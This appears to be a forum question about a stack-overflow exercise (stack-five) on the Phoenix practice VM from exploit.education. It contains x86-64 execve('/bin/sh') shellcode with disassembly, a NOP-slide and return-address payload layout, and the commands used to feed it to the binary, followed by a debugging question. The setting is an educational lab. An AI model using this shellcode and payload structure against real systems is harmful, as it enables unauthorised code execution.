Exploit education stack-five: trouble opening shell


Im trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I run onto a problem while exploiting a stack overflow. The challenge is run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

[NOP slide] (debug int3 \xcc) "\x48\x31\xd2"                                  // xor    %rdx, %rdx "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov  $  0x68732f6e69622f2f, %rbx "\x48\xc1\xeb\x08"                              // shr    $  0x8, %rbx "\x53"                                          // push   %rbx "\x48\x89\xe7"                                  // mov    %rsp, %rdi "\x50"                                          // push   %rax "\x57"                                          // push   %rdi "\x48\x89\xe6"                                  // mov    %rsp, %rsi "\xb0\x3b"                                      // mov    $  0x3b, %al "\x0f\x05";                                     // syscall (debug int3 \xcc) [padding] [override rip pointing to the middle of the NOP slide] 

I have tested int3’s before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but i cannot get the shell open.

I’m using this commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

user@phoenix-amd64:~$   cat exploit - | /opt/phoenix/amd64/stack-five cat exploit - | /opt/phoenix/amd64/stack-five Welcome to phoenix/stack-five, brought to you by https://exploit.education [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0 whoami Trace/breakpoint trap 

This int3 is AFTER the shellcode.

Some idea of what’s wrong?